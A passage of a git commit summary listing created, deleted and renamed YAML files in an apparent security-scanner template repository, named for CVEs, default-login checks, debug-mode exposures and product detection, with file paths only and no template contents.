poc/cve/cve-2012-0896.yaml create mode 100644 poc/cve/cve-2012-0901.yaml delete mode 100644 poc/cve/cve-2012-0981.yaml create mode 100644 poc/cve/cve-2012-0991-2151.yaml create mode 100644 poc/cve/cve-2012-0991.yaml create mode 100644 poc/cve/cve-2012-4242.yaml create mode 100644 poc/cve/cve-2013-2251-2239.yaml delete mode 100644 poc/cve/cve-2013-4117-2265.yaml delete mode 100644 poc/cve/cve-2013-5979-2280.yaml create mode 100644 poc/cve/cve-2013-7091-2285.yaml delete mode 100644 poc/cve/cve-2013-7240-2290.yaml delete mode 100644 poc/cve/cve-2014-3120-2316.yaml delete mode 100644 poc/cve/cve-2014-4513-2344.yaml create mode 100644 poc/cve/cve-2014-4536-2350.yaml create mode 100644 poc/cve/cve-2014-5368-2394.yaml create mode 100644 poc/cve/cve-2014-5368.yaml delete mode 100644 poc/cve/cve-2015-1000012-2461.yaml delete mode 100644 poc/cve/cve-2015-1880-2477.yaml delete mode 100644 poc/cve/cve-2015-2067-2482.yaml create mode 100644 poc/cve/cve-2015-2080-2489.yaml delete mode 100644 poc/cve/cve-2015-4050-2522.yaml create mode 100644 poc/cve/cve-2015-5531-2565.yaml delete mode 100644 poc/cve/cve-2015-8813-2620.yaml create mode 100644 poc/cve/cve-2016-1000131-2664.yaml delete mode 100644 poc/cve/cve-2016-1000138-2698.yaml create mode 100644 poc/cve/cve-2016-1000154-2740.yaml delete mode 100644 poc/cve/cve-2016-10940-2757.yaml delete mode 100644 poc/cve/cve-2016-2004-2774.yaml create mode 100644 poc/cve/cve-2017-1000029-2833.yaml delete mode 100644 poc/cve/cve-2017-1000486-2845.yaml delete mode 100644 poc/cve/cve-2017-10271-2858.yaml create mode 100644 poc/cve/cve-2017-11610-2874.yaml create mode 100644 poc/cve/cve-2017-12544-2890.yaml create mode 100644 poc/cve/cve-2017-12635-2913.yaml delete mode 100644 poc/cve/cve-2017-14135-2925.yaml create mode 100644 poc/cve/cve-2017-14849.yaml delete mode 100644 poc/cve/cve-2017-15363-2948.yaml delete mode 100644 poc/cve/cve-2017-17043-2977.yaml create mode 100644 poc/cve/cve-2017-17451-2983.yaml create mode 100644 poc/cve/cve-2017-18024-2992.yaml delete mode 100644 poc/cve/cve-2017-18536-2995.yaml delete mode 100644 poc/cve/cve-2017-3528.yaml delete mode 100644 poc/cve/cve-2017-6090-3044.yaml create mode 100644 poc/cve/cve-2017-9506.yaml create mode 100644 poc/cve/cve-2018-0296.yaml delete mode 100644 poc/cve/cve-2018-1000129.yaml create mode 100644 poc/cve/cve-2018-1000226-3139.yaml create mode 100644 poc/cve/cve-2018-10822-3178.yaml delete mode 100644 poc/cve/cve-2018-11409.yaml delete mode 100644 poc/cve/cve-2018-11776-3210.yaml create mode 100644 poc/cve/cve-2018-12031-3222.yaml delete mode 100644 poc/cve/cve-2018-12300-3240.yaml delete mode 100644 poc/cve/cve-2018-13380-3285.yaml create mode 100644 poc/cve/cve-2018-13980-3294.yaml create mode 100644 poc/cve/cve-2018-14013-3296.yaml create mode 100644 poc/cve/cve-2018-14912-3315.yaml delete mode 100644 poc/cve/cve-2018-14916-3319.yaml delete mode 100644 poc/cve/cve-2018-14931-3325.yaml delete mode 100644 poc/cve/cve-2018-15473.yaml create mode 100644 poc/cve/cve-2018-15961-3347.yaml create mode 100644 poc/cve/cve-2018-16288-3365.yaml delete mode 100644 poc/cve/cve-2018-16671-3394.yaml delete mode 100644 poc/cve/cve-2018-16716-3396.yaml delete mode 100644 poc/cve/cve-2018-18264.yaml delete mode 100644 poc/cve/cve-2018-18775-3446.yaml create mode 100644 poc/cve/cve-2018-19326-3464.yaml delete mode 100644 poc/cve/cve-2018-19753-3488.yaml delete mode 100644 poc/cve/cve-2018-19892(1).yaml delete mode 100644 poc/cve/cve-2018-19914(1).yaml delete mode 100644 poc/cve/cve-2018-20009(1).yaml create mode 100644 poc/cve/cve-2018-20011(1).yaml create mode 100644 poc/cve/cve-2018-20470-3497.yaml create mode 100644 poc/cve/cve-2018-3167.yaml create mode 100644 poc/cve/cve-2018-3238-3537.yaml create mode 100644 poc/cve/cve-2018-5715(1).yaml delete mode 100644 poc/cve/cve-2018-6910-3585.yaml delete mode 100644 poc/cve/cve-2018-7662-3617.yaml create mode 100644 poc/cve/cve-2018-8033-3632.yaml delete mode 100644 poc/cve/cve-2018-9161-3658.yaml delete mode 100644 poc/cve/cve-2018-9845-3664.yaml create mode 100644 "poc/cve/cve-2018\342\200\22314064.yaml" delete mode 100644 poc/cve/cve-2019-1010290-3700.yaml create mode 100644 poc/cve/cve-2019-10232-3703.yaml create mode 100644 poc/cve/cve-2019-11248-3731.yaml create mode 100644 poc/cve/cve-2019-12314.yaml delete mode 100644 poc/cve/cve-2019-12583(1).yaml create mode 100644 poc/cve/cve-2019-12962(1).yaml create mode 100644 poc/cve/cve-2019-13396-3812.yaml delete mode 100644 poc/cve/cve-2019-14251(1).yaml delete mode 100644 poc/cve/cve-2019-14470.yaml delete mode 100644 poc/cve/cve-2019-15043.yaml create mode 100644 poc/cve/cve-2019-15811(1).yaml delete mode 100644 poc/cve/cve-2019-15889.yaml delete mode 100644 poc/cve/cve-2019-16123-3918.yaml create mode 100644 poc/cve/cve-2019-16759.yaml create mode 100644 poc/cve/cve-2019-16931(1).yaml create mode 100644 poc/cve/cve-2019-16997-3966.yaml delete mode 100644 poc/cve/cve-2019-17538-3994.yaml create mode 100644 poc/cve/cve-2019-17558.yaml create mode 100644 poc/cve/cve-2019-18371(1).yaml create mode 100644 poc/cve/cve-2019-18394.yaml create mode 100644 poc/cve/cve-2019-19368.yaml create mode 100644 poc/cve/cve-2019-19824-4053.yaml create mode 100644 poc/cve/cve-2019-20354(1).yaml delete mode 100644 poc/cve/cve-2019-2729-4114.yaml delete mode 100644 poc/cve/cve-2019-3799.yaml create mode 100644 poc/cve/cve-2019-6112-4178.yaml create mode 100644 poc/cve/cve-2019-7315(1).yaml create mode 100644 poc/cve/cve-2019-7543-4231.yaml create mode 100644 poc/cve/cve-2019-7609-4233.yaml create mode 100644 poc/cve/cve-2019-8937-4278.yaml delete mode 100644 poc/cve/cve-2019-9082-4292.yaml create mode 100644 poc/cve/cve-2019-9915(1).yaml create mode 100644 poc/cve/cve-2019-9922(1).yaml delete mode 100644 poc/cve/cve-2020-10124(1).yaml delete mode 100644 poc/cve/cve-2020-10220.yaml create mode 100644 poc/cve/cve-2020-10549-4379.yaml delete mode 100644 poc/cve/cve-2020-11738(1).yaml create mode 100644 poc/cve/cve-2020-13158(1).yaml create mode 100644 poc/cve/cve-2020-13405(1).yaml delete mode 100644 poc/cve/cve-2020-13937.yaml delete mode 100644 poc/cve/cve-2020-13942.yaml delete mode 100644 poc/cve/cve-2020-13945-4535.yaml create mode 100644 poc/cve/cve-2020-14092-4540.yaml delete mode 100644 poc/cve/cve-2020-14408(1).yaml delete mode 100644 poc/cve/cve-2020-16139.yaml delete mode 100644 poc/cve/cve-2020-16920.yaml delete mode 100644 poc/cve/cve-2020-16952.yaml create mode 100644 poc/cve/cve-2020-17456-4666.yaml delete mode 100644 poc/cve/cve-2020-17519-4692.yaml delete mode 100644 poc/cve/cve-2020-17530-4696.yaml delete mode 100644 poc/cve/cve-2020-20988(1).yaml delete mode 100644 poc/cve/cve-2020-21224-4749.yaml delete mode 100644 poc/cve/cve-2020-22208(1).yaml create mode 100644 poc/cve/cve-2020-22209(1).yaml create mode 100644 poc/cve/cve-2020-22210(1).yaml create mode 100644 poc/cve/cve-2020-22840.yaml create mode 100644 poc/cve/cve-2020-23517.yaml create mode 100644 poc/cve/cve-2020-24579-4833.yaml create mode 100644 poc/cve/cve-2020-25540.yaml create mode 100644 poc/cve/cve-2020-25780-4895.yaml create mode 100644 poc/cve/cve-2020-26919-4928.yaml create mode 100644 poc/cve/cve-2020-26948-4935.yaml delete mode 100644 poc/cve/cve-2020-28976-4989.yaml delete mode 100644 poc/cve/cve-2020-29395.yaml delete mode 100644 poc/cve/cve-2020-3452(1).yaml delete mode 100644 poc/cve/cve-2020-35580-5049.yaml create mode 100644 poc/cve/cve-2020-35729-5065.yaml create mode 100644 poc/cve/cve-2020-35736-5068.yaml delete mode 100644 poc/cve/cve-2020-3580-5085.yaml create mode 100644 poc/cve/cve-2020-35847-5094.yaml create mode 100644 poc/cve/cve-2020-5284.yaml delete mode 100644 poc/cve/cve-2020-5405.yaml delete mode 100644 poc/cve/cve-2020-7943-5259.yaml create mode 100644 poc/cve/cve-2020-8115.yaml create mode 100644 poc/cve/cve-2020-8163.yaml create mode 100644 poc/cve/cve-2020-8641-5330.yaml create mode 100644 poc/cve/cve-2020-8654(1).yaml create mode 100644 poc/cve/cve-20200924a.yaml delete mode 100644 poc/cve/cve-2021-20114-5462.yaml delete mode 100644 poc/cve/cve-2021-20123-5463.yaml delete mode 100644 poc/cve/cve-2021-21389-5513.yaml delete mode 100644 poc/cve/cve-2021-21402.yaml delete mode 100644 poc/cve/cve-2021-21479-5524.yaml create mode 100644 poc/cve/cve-2021-21745(1).yaml create mode 100644 poc/cve/cve-2021-21799(1).yaml delete mode 100644 poc/cve/cve-2021-21801-5531.yaml create mode 100644 poc/cve/cve-2021-21881-5544.yaml create mode 100644 poc/cve/cve-2021-22054(1).yaml delete mode 100644 poc/cve/cve-2021-22214-5601.yaml delete mode 100644 poc/cve/cve-2021-22502(1).yaml create mode 100644 poc/cve/cve-2021-24236(1).yaml create mode 100644 poc/cve/cve-2021-24245(1).yaml create mode 100644 poc/cve/cve-2021-24286(1).yaml delete mode 100644 poc/cve/cve-2021-24300(1).yaml delete mode 100644 poc/cve/cve-2021-24340-5711.yaml create mode 100644 poc/cve/cve-2021-24342-5715.yaml delete mode 100644 poc/cve/cve-2021-24406-5736.yaml create mode 100644 poc/cve/cve-2021-24472-5744.yaml delete mode 100644 poc/cve/cve-2021-25008(1).yaml create mode 100644 poc/cve/cve-2021-25063-5794.yaml delete mode 100644 poc/cve/cve-2021-25085(1).yaml create mode 100644 poc/cve/cve-2021-25118(1).yaml create mode 100644 poc/cve/cve-2021-26702(1).yaml create mode 100644 poc/cve/cve-2021-26812-5884.yaml create mode 100644 poc/cve/cve-2021-27309(1).yaml create mode 100644 poc/cve/cve-2021-27748(1).yaml delete mode 100644 poc/cve/cve-2021-28377(1).yaml create mode 100644 poc/cve/cve-2021-28854-5972.yaml delete mode 100644 poc/cve/cve-2021-29490-6011.yaml create mode 100644 poc/cve/cve-2021-3019-6041.yaml create mode 100644 poc/cve/cve-2021-31249-6068.yaml delete mode 100644 poc/cve/cve-2021-31250-6070.yaml create mode 100644 poc/cve/cve-2021-3129.yaml delete mode 100644 poc/cve/cve-2021-31755-6106.yaml create mode 100644 poc/cve/cve-2021-31805(1).yaml delete mode 100644 poc/cve/cve-2021-32172-6126.yaml delete mode 100644 poc/cve/cve-2021-3223(1).yaml create mode 100644 poc/cve/cve-2021-32820-6148.yaml delete mode 100644 poc/cve/cve-2021-34643-6238.yaml create mode 100644 poc/cve/cve-2021-35265-6245.yaml delete mode 100644 poc/cve/cve-2021-35464-6252.yaml create mode 100644 poc/cve/cve-2021-37416(1).yaml delete mode 100644 poc/cve/cve-2021-37589(1).yaml delete mode 100644 poc/cve/cve-2021-38702-6314.yaml delete mode 100644 poc/cve/cve-2021-39211(1).yaml create mode 100644 poc/cve/cve-2021-39350-6344.yaml create mode 100644 poc/cve/cve-2021-40539-6368.yaml create mode 100644 poc/cve/cve-2021-40822(1).yaml create mode 100644 poc/cve/cve-2021-41174-6409.yaml delete mode 100644 poc/cve/cve-2021-41569(1).yaml create mode 100644 poc/cve/cve-2021-41691-6460.yaml create mode 100644 poc/cve/cve-2021-42192(1).yaml delete mode 100644 poc/cve/cve-2021-44077(1).yaml create mode 100644 poc/cve/cve-2021-44521-6556.yaml delete mode 100644 poc/cve/cve-2021-44528(1).yaml delete mode 100644 poc/cve/cve-2021-45046.yaml create mode 100644 poc/cve/cve-2021-46387-6601.yaml create mode 100644 poc/cve/cve-2021-46422(1).yaml delete mode 100644 poc/cve/cve-2022-0140(1).yaml delete mode 100644 poc/cve/cve-2022-0165(1).yaml delete mode 100644 poc/cve/cve-2022-0201(1).yaml delete mode 100644 poc/cve/cve-2022-0208(1).yaml delete mode 100644 poc/cve/cve-2022-0378-6624.yaml create mode 100644 poc/cve/cve-2022-0543(1).yaml delete mode 100644 poc/cve/cve-2022-0594(1).yaml delete mode 100644 poc/cve/cve-2022-0656(1).yaml delete mode 100644 poc/cve/cve-2022-0776(1).yaml create mode 100644 poc/cve/cve-2022-0952(1).yaml delete mode 100644 poc/cve/cve-2022-0963.yaml delete mode 100644 poc/cve/cve-2022-0968(1).yaml create mode 100644 poc/cve/cve-2022-1040(1).yaml delete mode 100644 poc/cve/cve-2022-1054(1).yaml create mode 100644 poc/cve/cve-2022-1221(1).yaml create mode 100644 poc/cve/cve-2022-1386(1).yaml delete mode 100644 poc/cve/cve-2022-1597(1).yaml create mode 100644 poc/cve/cve-2022-1609(1).yaml create mode 100644 poc/cve/cve-2022-1713(1).yaml create mode 100644 poc/cve/cve-2022-1724(1).yaml create mode 100644 poc/cve/cve-2022-1946(1).yaml create mode 100644 poc/cve/cve-2022-21500(1).yaml delete mode 100644 poc/cve/cve-2022-2187(1).yaml delete mode 100644 poc/cve/cve-2022-22536-6662.yaml delete mode 100644 poc/cve/cve-2022-22963.yaml delete mode 100644 poc/cve/cve-2022-22972(1).yaml delete mode 100644 poc/cve/cve-2022-24129(1).yaml create mode 100644 poc/cve/cve-2022-24681(1).yaml create mode 100644 poc/cve/cve-2022-24856(1).yaml create mode 100644 poc/cve/cve-2022-2486(1).yaml create mode 100644 poc/cve/cve-2022-2487(1).yaml delete mode 100644 poc/cve/cve-2022-2488(1).yaml delete mode 100644 poc/cve/cve-2022-26135(1).yaml create mode 100644 poc/cve/cve-2022-26233-6735.yaml delete mode 100644 poc/cve/cve-2022-26564(1).yaml create mode 100644 poc/cve/cve-2022-26960(1).yaml delete mode 100644 poc/cve/cve-2022-28079(1).yaml delete mode 100644 poc/cve/cve-2022-28080(1).yaml create mode 100644 poc/cve/cve-2022-29301(1).yaml delete mode 100644 poc/cve/cve-2022-29383(1).yaml create mode 100644 poc/cve/cve-2022-29455(1).yaml create mode 100644 poc/cve/cve-2022-29455.yaml delete mode 100644 poc/cve/cve-2022-29464(1).yaml create mode 100644 poc/cve/cve-2022-30073(1).yaml create mode 100644 poc/cve/cve-2022-30489(1).yaml create mode 100644 poc/cve/cve-2022-30525(1).yaml create mode 100644 poc/cve/cve-2022-30776(1).yaml delete mode 100644 poc/cve/cve-2022-30777(1).yaml delete mode 100644 poc/cve/cve-2022-31268(1).yaml create mode 100644 poc/cve/cve-2022-32025(1).yaml create mode 100644 poc/cve/cve-2022-32026(1).yaml delete mode 100644 poc/cve/cve-2022-34046(1).yaml create mode 100644 poc/cve/cve-2022-34047(1).yaml delete mode 100644 poc/cve/cve-2022-34049(1).yaml create mode 100644 poc/cve/cve-2022-35416(1).yaml delete mode 100644 poc/cve/cve-2022-36883(1).yaml create mode 100644 poc/cve/cve-2022-42889.yaml delete mode 100644 poc/cve/cve-2024-23897.yaml rename poc/cve/{RCE-CVE-2021-41773.yaml => rce-cve-2021-41773.yaml} (100%) create mode 100644 poc/cve/resin-cnnvd-200705-315-9865.yaml delete mode 100644 poc/cve/resin-cnnvd-200705-315-9866.yaml create mode 100644 poc/debug/android-debug-database-exposed-314.yaml delete mode 100644 poc/debug/aspx-debug-mode-575.yaml create mode 100644 poc/debug/aspx-debug-mode.yaml delete mode 100644 poc/debug/browserless-debugger-794.yaml rename poc/debug/{coldfusion-debug-xss.yaml => coldfusion-debug-xss-1153.yaml} (100%) delete mode 100644 poc/debug/debug-enabled-6788.yaml delete mode 100644 poc/debug/django-debug-detect-7026.yaml rename poc/debug/{django-debug.yml => django-debug.yaml} (100%) delete mode 100644 poc/debug/jboss-seam-debug-page-8239.yaml create mode 100644 poc/debug/jboss-seam-debug-page-8240.yaml create mode 100644 poc/debug/php-debug-bar-9507.yaml delete mode 100644 poc/debug/symfony-debugmode-10618.yaml rename poc/debug/{wamp-xdebug-detect-11103.yaml => wamp-xdebug-detect-11100.yaml} (100%) create mode 100644 poc/debug/werkzeug-debugger-detect-11196.yaml delete mode 100644 poc/debug/werkzeug-debugger-detect-11197.yaml rename poc/debug/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%) create mode 100644 poc/debug/yii-debugger-11738.yaml delete mode 100644 poc/debug/yii-debugger-11741.yaml rename poc/default/{activemq-default-login-44.yaml => activemq-default-login.yaml} (100%) delete mode 100644 poc/default/aem-default-get-servlet-135.yaml create mode 100644 poc/default/aem-default-get-servlet-137.yaml create mode 100644 poc/default/aem-default-login-140.yaml create mode 100644 poc/default/alphaweb-default-login-275.yaml create mode 100644 poc/default/ambari-default-login-287.yaml create mode 100644 poc/default/apisix-default-login-491.yaml create mode 100644 poc/default/azkaban-default-login-674.yaml delete mode 100644 poc/default/azkaban-default-login.yaml rename poc/default/{businessintelligence-default-login-817.yaml => businessintelligence-default-login-814.yaml} (100%) delete mode 100644 poc/default/businessintelligence-default-login.yaml create mode 100644 poc/default/chinaunicom-default-login-909.yaml create mode 100644 poc/default/cobbler-default-login.yaml delete mode 100644 poc/default/cs141-default-login-1277.yaml create mode 100644 poc/default/cs141-default-login-1278.yaml create mode 100644 poc/default/default-apache-test-all-6813.yaml rename poc/default/{default-apache-test-all-6815.yaml => default-apache-test-all.yaml} (100%) create mode 100644 poc/default/default-apache-test-page.yaml create mode 100644 poc/default/default-apache2-ubuntu-page.yaml delete mode 100644 poc/default/default-centos-test-page.yaml delete mode 100644 poc/default/default-codeigniter-page-6833.yaml rename poc/default/{default-django-page-6840.yaml => default-django-page.yaml} (100%) create mode 100644 poc/default/default-fastcgi-page.yaml rename poc/default/{default-fedora-page.yaml => default-fedora-page-6848.yaml} (100%) delete mode 100644 poc/default/default-glassfish-server-page-6852.yaml delete mode 100644 poc/default/default-iis7-page-6858.yaml create mode 100644 poc/default/default-lucee-page-6870.yaml create mode 100644 poc/default/default-lucee-page-6871.yaml delete mode 100644 poc/default/default-microsoft-azure-page.yaml create mode 100644 poc/default/default-nginx-page-6880.yaml delete mode 100644 poc/default/default-oracle-application-page.yaml rename poc/default/{default-payara-server-page.yaml => default-payara-server-page-6894.yaml} (100%) delete mode 100644 poc/default/default-plesk-page-6899.yaml create mode 100644 poc/default/default-redhat-test-page.yaml create mode 100644 poc/default/default-ssltls-test-page-6908.yaml create mode 100644 poc/default/default-windows-server-page.yaml delete mode 100644 poc/default/dell-idrac-default-login-6946.yaml delete mode 100644 poc/default/dell-idrac9-default-login-6932.yaml delete mode 100644 poc/default/dolphinscheduler-default-login-7073.yaml create mode 100644 poc/default/dubbo-admin-default-login-7120.yaml delete mode 100644 poc/default/dubbo-admin-default-login.yaml create mode 100644 poc/default/exacqvision-default-login-7277.yaml create mode 100644 poc/default/flir-default-login.yaml rename poc/default/{frp-default-login.yaml => frp-default-login-7559.yaml} (100%) delete mode 100644 poc/default/ftp-default-creds.yaml rename poc/default/{fuelcms-default-login.yaml => fuelcms-default-login-7571.yaml} (100%) delete mode 100644 poc/default/fuelcms-default-login-7572.yaml create mode 100644 poc/default/geoserver-default-login-7594.yaml create mode 100644 poc/default/geoserver-default-login.yaml delete mode 100644 poc/default/gophish-default-login.yaml create mode 100644 poc/default/grafana-default-login-7804.yaml delete mode 100644 poc/default/guacamole-default-login-7859.yaml delete mode 100644 poc/default/hp-switch-default-login.yaml delete mode 100644 poc/default/huawei-hg532e-default-router-login-8064.yaml create mode 100644 poc/default/ibm-mqseries-default-login-8106.yaml delete mode 100644 poc/default/ibm-mqseries-default-login-8107.yaml create mode 100644 poc/default/inspur-clusterengine-default-login.yaml delete mode 100644 poc/default/iptime-default-login-8193.yaml delete mode 100644 poc/default/jenkins-default-8271.yaml delete mode 100644 poc/default/jinher-oa-default-login-8312.yaml delete mode 100644 poc/default/jmx-default-login-8355.yaml create mode 100644 poc/default/jmx-default-login.yaml create mode 100644 poc/default/kafka-center-default-login-8416.yaml delete mode 100644 poc/default/lighttpd-default-8627.yaml delete mode 100644 poc/default/mantisbt-default-credential-8779.yaml delete mode 100644 poc/default/minio-default-login-8888.yaml delete mode 100644 poc/default/nagios-default-login-8991.yaml create mode 100644 poc/default/nagios-default-login.yaml create mode 100644 poc/default/octobercms-default-login-9192.yaml rename poc/default/{octobercms-default-login-9193.yaml => octobercms-default-login.yaml} (100%) delete mode 100644 poc/default/operations-automation-default-page-9337.yaml create mode 100644 poc/default/panabit-default-login-9438.yaml rename poc/default/{panabit-default-login-9440.yaml => panabit-default-login.yaml} (100%) delete mode 100644 poc/default/panabit-ixcache-default-login.yaml delete mode 100644 poc/default/pentaho-default-login.yaml delete mode 100644 poc/default/rabbitmq-default-login-9786.yaml delete mode 100644 poc/default/rabbitmq-default-login.yaml delete mode 100644 poc/default/rainloop-default-login-9813.yaml rename poc/default/{rancher-default-login-9815.yaml => rancher-default-login.yaml} (100%) delete mode 100644 poc/default/ranger-default-login-9827.yaml rename poc/default/{ranger-default-login-9828.yaml => ranger-default-login.yaml} (100%) delete mode 100644 poc/default/rockmongo-default-login.yaml create mode 100644 poc/default/rseenet-default-login-9913.yaml create mode 100644 poc/default/secnet-ac-default-login.yaml delete mode 100644 poc/default/sequoiadb-default-login-10151.yaml create mode 100644 poc/default/sequoiadb-default-login-10152.yaml create mode 100644 poc/default/solarwinds-default-login-10354.yaml create mode 100644 poc/default/stackstorm-default-login-10530.yaml delete mode 100644 poc/default/supermicro-default-login.yaml delete mode 100644 poc/default/szhe-default-login-10638.yaml create mode 100644 poc/default/szhe-default-login.yaml create mode 100644 poc/default/telecom-gateway-default-login.yaml create mode 100644 poc/default/ucmdb-default-login-10871.yaml delete mode 100644 poc/default/ucmdb-default-login.yaml delete mode 100644 poc/default/versa-default-login.yaml create mode 100644 poc/default/visionhub-default-login-11026.yaml rename poc/default/{visionhub-default-login-11029.yaml => visionhub-default-login.yaml} (100%) create mode 100644 poc/default/wifisky-default-login-11201.yaml create mode 100644 poc/default/wifisky-default-login.yaml rename poc/default/{wso2-default-login-11641.yaml => wso2-default-login.yaml} (100%) delete mode 100644 poc/default/xampp-default-page-11663.yaml delete mode 100644 poc/default/xampp-default-page.yaml rename poc/default/{zabbix-default-login-11762.yaml => zabbix-default-login-11763.yaml} (100%) create mode 100644 poc/default/zmanda-default-login-11826.yaml delete mode 100644 poc/default/zmanda-default-login.yaml create mode 100644 poc/detect/acontent-detect-32.yaml rename poc/detect/{acontent-detect.yaml => acontent-detect-33.yaml} (100%) create mode 100644 poc/detect/addeventlistener-detect-65.yaml delete mode 100644 poc/detect/addeventlistener-detect-66.yaml delete mode 100644 poc/detect/adobe-coldfusion-detect-82.yaml create mode 100644 poc/detect/adobe-coldfusion-detect.yaml rename poc/detect/{adobe-coldfusion-error-detect.yaml => adobe-coldfusion-error-detect-88.yaml} (100%) create mode 100644 poc/detect/aem-detection-144.yaml delete mode 100644 poc/detect/aem-detection-145.yaml create mode 100644 poc/detect/airflow-detect-239.yaml rename poc/detect/{airflow-detect-240.yaml => airflow-detect.yaml} (100%) delete mode 100644 poc/detect/alfresco-detect-258.yaml create mode 100644 poc/detect/alfresco-detect-260.yaml delete mode 100644 poc/detect/apache-detect-348.yaml create mode 100644 poc/detect/apollo-server-detect-523.yaml rename poc/detect/{apollo-server-detect-522.yaml => apollo-server-detect.yaml} (100%) create mode 100644 poc/detect/artica-web-proxy-detect-543.yaml create mode 100644 poc/detect/autobahn-python-detect-594.yaml delete mode 100644 poc/detect/avantfax-detect-598.yaml delete mode 100644 poc/detect/azure-takeover-detection-681.yaml delete mode 100644 poc/detect/bedita-detect-704.yaml create mode 100644 poc/detect/bigbluebutton-detect-723.yaml delete mode 100644 poc/detect/bigbluebutton-detect.yaml create mode 100644 poc/detect/bigip-config-utility-detect-731.yaml create mode 100644 poc/detect/bigip-config-utility-detect-733.yaml delete mode 100644 poc/detect/brother-printer-detect-790.yaml create mode 100644 poc/detect/burp-api-detect-810.yaml delete mode 100644 poc/detect/burp-api-detect.yaml delete mode 100644 poc/detect/carestream-vue-detect-861.yaml delete mode 100644 poc/detect/centreon-detect-877.yaml delete mode 100644 poc/detect/chevereto-detect-905.yaml create mode 100644 poc/detect/chevereto-detect.yaml delete mode 100644 poc/detect/citrix-adc-gateway-detect-983.yaml delete mode 100644 poc/detect/citrix-vpn-detect-984.yaml delete mode 100644 poc/detect/cockpit-detect-1126.yaml delete mode 100644 poc/detect/craft-cms-detect-1248.yaml delete mode 100644 poc/detect/custom-data-result-service-detect.yaml delete mode 100644 poc/detect/dell-idrac6-detect-6918.yaml delete mode 100644 poc/detect/dell-idrac6-detect.yaml create mode 100644 poc/detect/dell-idrac7-detect-6922.yaml create mode 100644 poc/detect/dell-idrac8-detect-6927.yaml create mode 100644 poc/detect/dell-idrac8-detect.yaml delete mode 100644 poc/detect/dell-idrac9-detect-6938.yaml delete mode 100644 poc/detect/dell-idrac9-detect-6939.yaml create mode 100644 poc/detect/detect-addpac-voip-gateway-6965.yaml create mode 100644 poc/detect/detect-dangling-cname-6966.yaml delete mode 100644 poc/detect/detect-options-method-6977.yaml create mode 100644 poc/detect/detect-rsyncd-6982.yaml create mode 100644 poc/detect/detect-sentry-6984.yaml rename poc/detect/{detect-sentry-6983.yaml => detect-sentry.yaml} (100%) delete mode 100644 poc/detect/django-debug-detect-7026.yaml delete mode 100644 poc/detect/dolibarr-detect-7069.yaml delete mode 100644 poc/detect/dwr-index-detect-7134.yaml delete mode 100644 poc/detect/ec2-detection-7162.yaml create mode 100644 poc/detect/eg-manager-detect-7183.yaml delete mode 100644 poc/detect/eg-manager-detect.yaml create mode 100644 poc/detect/elasticsearch-sql-client-detect-7190.yaml create mode 100644 poc/detect/elasticsearch-sql-client-detect.yaml create mode 100644 poc/detect/esmtp-detect.yaml create mode 100644 poc/detect/exim-detect.yaml rename poc/detect/{fanruanoa-detect.yaml => fanruanoa-detect-7391.yaml} (100%) delete mode 100644 poc/detect/fatpipe-mpvpn-detect-7437.yaml create mode 100644 poc/detect/fatpipe-warp-detect-7439.yaml create mode 100644 poc/detect/favicon-detection-7443.yaml delete mode 100644 poc/detect/firebase-detect-7493.yaml delete mode 100644 poc/detect/froxlor-detect-7552.yaml rename poc/detect/{froxlor-detect-7553.yaml => froxlor-detect.yaml} (100%) delete mode 100644 poc/detect/getsimple-cms-detector-7613.yaml delete mode 100644 poc/detect/github-enterprise-detect-7649.yaml create mode 100644 poc/detect/gradle-cache-node-detect-7798.yaml delete mode 100644 poc/detect/grafana-detect-7807.yaml delete mode 100644 poc/detect/graphql-detect-7831.yaml create mode 100644 poc/detect/grav-cms-detect-7843.yaml rename poc/detect/{grav-cms-detect.yaml => grav-cms-detect-7844.yaml} (100%) delete mode 100644 poc/detect/harbor-detect.yaml rename poc/detect/{herokuapp-detect-7937.yaml => herokuapp-detect-7939.yaml} (100%) delete mode 100644 poc/detect/hp-blade-admin-detect-8004.yaml create mode 100644 poc/detect/hp-laserjet-detect.yaml delete mode 100644 poc/detect/htpasswd-detection-8046.yaml delete mode 100644 poc/detect/ilo-detect-8154.yaml rename poc/detect/{ilo-detect.yaml => ilo-detect-8155.yaml} (100%) create mode 100644 poc/detect/influxdb-detect-8159.yaml delete mode 100644 poc/detect/itop-detect-8203.yaml delete mode 100644 poc/detect/jeecg-boot-detect.yaml delete mode 100644 poc/detect/jellyfin-detect.yaml create mode 100644 poc/detect/jira-detect-8314.yaml create mode 100644 poc/detect/kevinlab-device-detect.yaml delete mode 100644 poc/detect/leostream-detection.yml rename poc/detect/{liferay-portal-detect-8623.yaml => liferay-portal-detect-8626.yaml} (100%) create mode 100644 poc/detect/lucee-detect-8659.yaml rename poc/detect/{magmi-detect.yaml => magmi-detect-8714.yaml} (100%) create mode 100644 poc/detect/maian-cart-detect-8719.yaml delete mode 100644 poc/detect/maian-cart-detect.yaml create mode 100644 poc/detect/mantis-detect-8780.yaml delete mode 100644 poc/detect/mantis-detect-8782.yaml create mode 100644 poc/detect/metabase-detect-8804.yaml create mode 100644 poc/detect/microsoft-exchange-server-detect-8853.yaml delete mode 100644 poc/detect/microweber-detect-8862.yaml create mode 100644 poc/detect/minio-console-detect-8884.yaml delete mode 100644 poc/detect/minio-detect-8892.yaml create mode 100644 poc/detect/moinmoin-detect-8916.yaml delete mode 100644 poc/detect/ms-adcs-detect-8960.yaml create mode 100644 poc/detect/ms-adcs-detect-8961.yaml delete mode 100644 poc/detect/mx-service-detector.yaml delete mode 100644 poc/detect/netsweeper-webadmin-detect-9068.yaml rename poc/detect/{nextcloud-detect.yaml => nextcloud-detect-9081.yaml} (100%) delete mode 100644 poc/detect/nexus-detect-9095.yaml rename poc/detect/{nexus-detect-9093.yaml => nexus-detect.yaml} (100%) create mode 100644 poc/detect/node-red-detect-9139.yaml delete mode 100644 poc/detect/node-red-detect.yaml create mode 100644 poc/detect/oauth2-detect-9181.yaml create mode 100644 poc/detect/oipm-detect-9221.yaml delete mode 100644 poc/detect/oipm-detect-9222.yaml delete mode 100644 poc/detect/oneblog-detect.yaml create mode 100644 poc/detect/open-virtualization-manager-detect-9326.yaml delete mode 100644 poc/detect/openemr-detect-9273.yaml create mode 100644 poc/detect/openemr-detect-9274.yaml create mode 100644 poc/detect/opensis-detect-9313.yaml create mode 100644 poc/detect/oracle-dbass-detect-9351.yaml delete mode 100644 poc/detect/php-proxy-detect-9545.yaml create mode 100644 poc/detect/php-proxy-detect.yaml create mode 100644 poc/detect/phpcollab-detect-9499.yaml delete mode 100644 poc/detect/phpcollab-detect-9501.yaml delete mode 100644 